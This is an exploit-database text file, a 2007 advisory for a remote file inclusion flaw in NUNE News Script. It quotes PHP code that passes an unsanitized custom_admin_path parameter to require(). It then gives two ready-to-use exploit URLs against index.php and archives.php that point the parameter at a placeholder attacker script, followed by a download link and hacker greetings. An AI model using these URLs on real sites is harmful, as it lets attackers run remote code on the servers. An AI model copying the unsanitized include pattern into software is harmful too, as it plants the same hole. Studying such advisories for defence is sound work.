exploit-db-mirror/exploits/php/webapps/3090.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

40 lines
No EOL
943 B
Text

-----------------------------------------------
NUNE News Script (custom_admin_path) Remote File Include Vulnerablity
-----------------------------------------------
Author: xoron
-----------------------------------------------
Code:
if (isset($custom_admin_path))
$special_admin_path = $custom_admin_path;
else
$special_admin_path = "news/admin";
require("$special_admin_path/config/nune.conf.php");
-----------------------------------------------
3xplo!t:
www.target.com/[script]/index.php?custom_admin_path=http://evilscript?
www.target.com/[script]/archives.php?custom_admin_path=http://evilscript?
-----------------------------------------------
download: http://download.sourceforge.net/nune/nune-2.0pre2.tar.gz
-----------------------------------------------
Greetz: str0ke, kacper, GODAttach
nukedx'e elveda, kendine iyi bak dostum..!
-----------------------------------------------
# milw0rm.com [2007-01-06]